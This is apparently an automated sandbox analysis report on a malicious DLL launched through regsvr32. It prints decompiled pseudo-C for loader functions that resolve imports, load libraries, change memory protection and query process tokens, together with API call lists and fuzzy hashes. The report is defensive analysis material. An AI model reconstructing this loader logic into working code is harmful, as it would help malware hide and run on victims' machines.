Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
Instruction ID: c754c69a99eee57bc17a19cef26cf4e48c55fe35ecd49d9a529ee64d39f5317a
Opcode Fuzzy Hash: c61367c42b0475a435da7ef8647a919691ac96a9d7cf21db5be20c61e91521ee
Instruction Fuzzy Hash: 5AC04CF8241350A6F620DF408C85FC57A51B7A5785F124504F214251D9CBB51094851D

Uniqueness

Uniqueness Score: -1.00%

Function 10001634, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001634(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x10004140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4);
				_t18 = E10001146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x10004140 - 0x63698bc4 &  !( *0x10004140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E10001CBE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E10001BAC(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E10001020(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E1000201E(_t42);
					L8:
					return _t29;
				}
			}

0x1000163c
0x1000163e
0x1000165a
0x1000166b
0x10001672
0x100016d0
0x00000000
0x10001674
0x10001674
0x1000167e
0x10001682
0x10001687
0x1000168a
0x1000168f
0x10001693
0x10001698
0x1000169d
0x100016a1
0x100016a6
0x100016a7
0x100016ab
0x100016b0
0x100016b8
0x100016b8
0x100016b0
0x100016a1
0x10001693
0x100016ba
0x100016c3
0x100016c7
0x100016d1
0x100016d7
0x100016d7

APIs

Part of subcall function 10001146: GetModuleHandleA.KERNEL32(?,00000020), ref: 1000116A
Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 1000118C
Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011A2
Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011B8
Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011CE
Part of subcall function 10001146: GetProcAddress.KERNEL32(00000000,?), ref: 100011E4

Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?,?,?,?,?,?,1000167E,?), ref: 10001CF5
Part of subcall function 10001CBE: memcpy.NTDLL(?,?,?), ref: 10001D2A

Part of subcall function 10001BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4

Part of subcall function 10001020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001059
Part of subcall function 10001020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100010CE
Part of subcall function 10001020: GetLastError.KERNEL32 ref: 100010D4

GetLastError.KERNEL32 ref: 100016B2

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
Instruction ID: 2910a6364c5bb3ba5c3e70b9206c46a00ef4e134a19efb6f23cc70e8801df8ba
Opcode Fuzzy Hash: 128863c4b96fdd5e0b5520693e17a9650446fa3d9ad2d900b697df63d12b79e3
Instruction Fuzzy Hash: 3311087A7003126BE721DBA98CC0DDF77BCEF882847054128F901D7649EBA1ED0687A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001F0E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001F0E() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x10001f0f
0x10001f1d
0x10001f23
0x10001f2a
0x10001f81
0x10001f81
0x10001f2c
0x10001f34
0x10001f41
0x10001f41
0x10001f7d
0x10001f7f
0x00000000
0x00000000
0x00000000
0x10001f36
0x10001f3d
0x10001f43
0x10001f43
0x10001f48
0x10001f56
0x10001f5b
0x10001f61
0x10001f67
0x10001f6e
0x10001f70
0x10001f70
0x10001f7a
0x10001f3f
0x10001f3f
0x00000000
0x10001f3f
0x10001f3d

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,73B763F0), ref: 10001F1D
GetVersion.KERNEL32 ref: 10001F2C
GetCurrentProcessId.KERNEL32 ref: 10001F48
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
Instruction ID: 81d6f718ae41dea5634b5d6ac1f0cee9f6b854f783bc08cc4c4759fd43992b84
Opcode Fuzzy Hash: 6b78b0ba66763b1fda00833f905b6321ffd1b1deaffe8dbc06cc9ba591ad23f3
Instruction Fuzzy Hash: 50F0AFB06453329BF7019F68ADA97D63BE4E7097D2F024125F641C61ECDBB095828B4C

Uniqueness

Uniqueness Score: -1.00%

Function 100023A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100023A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x100023af
0x100023b2
0x100023b8
0x100023d6
0x00000000
0x100023d6
0x100023c0
0x100023c9
0x100023cf
0x100023de
0x100023e1
0x100023e4
0x100023ee
0x100023ee
0x100023f0
0x100023f3
0x100023f5
0x100023f5
0x100023f7
0x100023fa
0x00000000
0x00000000
0x100023fc
0x100023fe
0x10002464
0x10002464
0x100025c2
0x00000000
0x100025c2
0x10002400
0x10002400
0x10002404
0x10002406
0x10002406
0x10002406
0x10002406
0x10002409
0x1000240a
0x1000240d
0x1000240d
0x10002411
0x10002415
0x10002423
0x10002423
0x1000242b
0x10002431
0x10002433
0x10002435
0x10002445
0x10002452
0x10002456
0x1000245b
0x1000245d
0x100024db
0x100024db
0x1000245f
0x1000245f
0x1000245f
0x100024dd
0x100024df
0x100025c0
0x100025c0
0x00000000
0x100024e5
0x100024e5
0x100024ec
0x00000000
0x00000000
0x100024f2
0x100024f6
0x10002552
0x10002554
0x1000255c
0x1000255e
0x10002560
0x00000000
0x00000000
0x10002562
0x10002568
0x1000256a
0x1000256c
0x10002581
0x10002581
0x10002583
0x100025b2
0x100025b9
0x00000000
0x100025b9
0x10002587
0x10002588
0x1000258a
0x1000258c
0x1000258c
0x1000258e
0x10002590
0x10002592
0x100025a6
0x100025a6
0x100025a9
0x100025ab
0x100025ab
0x100025ac
0x100025ac
0x00000000
0x10002594
0x10002594
0x10002594
0x1000259d
0x1000259e
0x100025a0
0x100025a2
0x100025a2
0x00000000
0x10002594
0x10002592
0x1000256e
0x10002575
0x10002575
0x10002577
0x00000000
0x00000000
0x10002579
0x1000257a
0x1000257d
0x1000257f
0x00000000
0x00000000
0x00000000
0x1000257f
0x00000000
0x10002575
0x100024f8
0x100024fb
0x10002500
0x00000000
0x00000000
0x10002509
0x1000250b
0x10002511
0x00000000
0x00000000
0x10002517
0x1000251d
0x00000000
0x00000000
0x10002523
0x10002525
0x1000252e
0x10002532
0x00000000
0x00000000
0x10002538
0x1000253b
0x1000253d
0x00000000
0x00000000
0x10002544
0x10002546
0x00000000
0x00000000
0x10002548
0x1000254c
0x00000000
0x00000000
0x00000000
0x1000254c
0x00000000
0x00000000
0x00000000
0x10002437
0x10002437
0x10002437
0x1000243e
0x00000000
0x00000000
0x10002440
0x10002441
0x10002443
0x00000000
0x00000000
0x00000000
0x10002443
0x1000246b
0x1000246d
0x00000000
0x00000000
0x1000247d
0x1000247f
0x10002481
0x00000000
0x00000000
0x10002487
0x1000248e
0x100024ba
0x100024ba
0x100024bc
0x100024be
0x100024d2
0x100024d4
0x00000000
0x00000000
0x00000000
0x00000000
0x100024c0
0x100024c0
0x100024c0
0x100024c9
0x100024ca
0x100024cc
0x100024ce
0x100024ce
0x00000000
0x100024c0
0x10002490
0x10002493
0x10002495
0x100024a7
0x100024a7
0x100024aa
0x100024ac
0x100024ac
0x100024ad
0x100024ad
0x100024b3
0x00000000
0x00000000
0x00000000
0x00000000
0x10002497
0x10002497
0x10002497
0x1000249e
0x00000000
0x00000000
0x100024a0
0x100024a0
0x100024a1
0x00000000
0x00000000
0x00000000
0x100024a1
0x100024a3
0x100024a5
0x100024b8
0x00000000
0x00000000
0x00000000
0x100024b8
0x00000000
0x100024a5
0x10002417
0x1000241a
0x1000241d
0x00000000
0x00000000
0x1000241f
0x10002421
0x00000000
0x00000000
0x00000000
0x10002421
0x100023e6
0x100023e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002456

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
Instruction ID: d6971719ee8f1b9f11e38fe3953f76bbe497b20de1934e034d516acabf99b4ad
Opcode Fuzzy Hash: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
Instruction Fuzzy Hash: AC61EE70A00A56DFFB19CF28DCE065933E5EB853D5F228469D806C729DEB30DD828754

Uniqueness

Uniqueness Score: -1.00%

Function 10002184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10002184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100022EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100023A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100022EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10002188
0x10002189
0x1000218a
0x1000218d
0x1000218f
0x10002192
0x10002193
0x10002195
0x10002196
0x10002197
0x1000219a
0x100021a4
0x10002255
0x1000225c
0x10002265
0x100021aa
0x100021aa
0x100021b0
0x100021b6
0x100021b9
0x100021bc
0x100021c0
0x100021c5
0x100021ca
0x1000224a
0x00000000
0x100021cc
0x100021cc
0x100021d8
0x100021da
0x10002235
0x10002235
0x1000223b
0x00000000
0x100021dc
0x100021eb
0x100021ed
0x100021ee
0x100021ef
0x100021f2
0x100021f2
0x100021f4
0x00000000
0x100021f6
0x100021f6
0x10002240
0x100021f8
0x100021f8
0x100021fc
0x10002204
0x10002209
0x1000220e
0x1000221a
0x10002222
0x10002229
0x1000222f
0x10002233
0x00000000
0x10002233
0x100021f6
0x100021f4
0x00000000
0x100021da
0x1000224e
0x1000224e
0x1000224e
0x100021ca
0x1000226a
0x10002271

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: adb68764e4b497ef4a4b49f2527e322eb7aaba1ac7dc589ecd7eb92557e13467
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 9221CB76900205AFD710DFA8CCC09A7F7A5FF49390B468169ED599B249D730FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 6620 Parent PID: 6560 regsvr32.exeCOMMON

Executed Functions

Function 0464104F, Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(046483A8), ref: 0464106D

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

memset.NTDLL ref: 0464109E
RtlInitializeCriticalSection.NTDLL(05D3C0A0), ref: 046410AF

Part of subcall function 0463CA04: RtlInitializeCriticalSection.NTDLL(04648380), ref: 0463CA28
Part of subcall function 0463CA04: RtlInitializeCriticalSection.NTDLL(04648360), ref: 0463CA3E
Part of subcall function 0463CA04: GetVersion.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0463CA4F
Part of subcall function 0463CA04: GetModuleHandleA.KERNEL32(00001703,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0463CA83

Part of subcall function 0463E6E9: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 0463E703

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,04637FB0,?), ref: 046410D8
GetLastError.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046410E9
CloseHandle.KERNEL32(000002BC,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046410FD
GetUserNameA.ADVAPI32(00000000,?), ref: 04641146
RtlAllocateHeap.NTDLL(00000000,?), ref: 04641159
GetUserNameA.ADVAPI32(00000000,?), ref: 0464116E
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0464119E
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046411B3
GetLastError.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046411BD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046411CA
GetShellWindow.USER32 ref: 046411E5
GetWindowThreadProcessId.USER32(00000000), ref: 046411EC
memcpy.NTDLL(04648274,?,00000018,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04641228
CreateEventA.KERNEL32(04648168,00000001,00000000,00000000,61636F4C,00000001,?,?,?,?,?,?,?,04637FB0,?), ref: 046412A6
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 046412D0
OpenEventA.KERNEL32(00100000,00000000,05D3B9D0,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046412F8
CreateEventA.KERNEL32(04648168,00000001,00000000,05D3B9D0,?,?,?,?,?,?,?,04637FB0,?), ref: 0464130D
GetLastError.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04641313
LoadLibraryA.KERNEL32(41564441,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046413AB
SetEvent.KERNEL32(?,Function_00012ABC,00000000,00000000,?,?,?,?,?,?,?,04637FB0,?), ref: 04641441
RtlAllocateHeap.NTDLL(00000000,00000043,Function_00012ABC), ref: 04641456
wsprintfA.USER32 ref: 04641486

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
String ID:
API String ID: 3929413950-0
Opcode ID: 13956a8ceaa490bc7eb8c0e81100aa33b57b4b9949ad30f3716e5d8ab27550a5
Instruction ID: cf57c64811193b7795150d7ed78f6ad6bdc8e2f6ef509907697c3d2c6993727e
Opcode Fuzzy Hash: 13956a8ceaa490bc7eb8c0e81100aa33b57b4b9949ad30f3716e5d8ab27550a5
Instruction Fuzzy Hash: AEC16DB85007549FCF20EF65E84896B7BE8FBD6704B11681EE545C3241F738A888CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0463DDC5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0463DE0C
NtOpenProcessToken.NTDLL(?,00000008,S:(M), ref: 0463DE1F
NtQueryInformationToken.NTDLL(S:(M,00000001,00000000,00000000,?), ref: 0463DE3B

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0463DE58
memcpy.NTDLL(?,00000000,0000001C), ref: 0463DE65
NtClose.NTDLL(?), ref: 0463DE77
NtClose.NTDLL(?), ref: 0463DE81

Strings

S:(M, xrefs: 0463DE16, 0463DE38, 0463DE19

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID: S:(M
API String ID: 2575439697-2217774225
Opcode ID: 8c2338e6743a17ddaa22d77a16f564215fb65ddc51abb7afc3d4a9ac98882fe6
Instruction ID: 5ab5959b66c89959289e25a781161b6c5e799ca79c605bff92ebbb906bfcf6f1
Opcode Fuzzy Hash: 8c2338e6743a17ddaa22d77a16f564215fb65ddc51abb7afc3d4a9ac98882fe6
Instruction Fuzzy Hash: 9021F8B2900218BFDF01AFA5DC45ADEBFBDEF48B50F104026F904E6150E7759A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04637EA1, Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(05D3B5B0,00000000,0000005C,?,?,4D283A53), ref: 04637EDD
_strupr.NTDLL ref: 04637EF3
lstrlen.KERNEL32(05D3B5B0,?,4D283A53), ref: 04637EFB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,4D283A53), ref: 04637F76
RtlAddVectoredExceptionHandler.NTDLL(00000000,046377E9), ref: 04637F9D
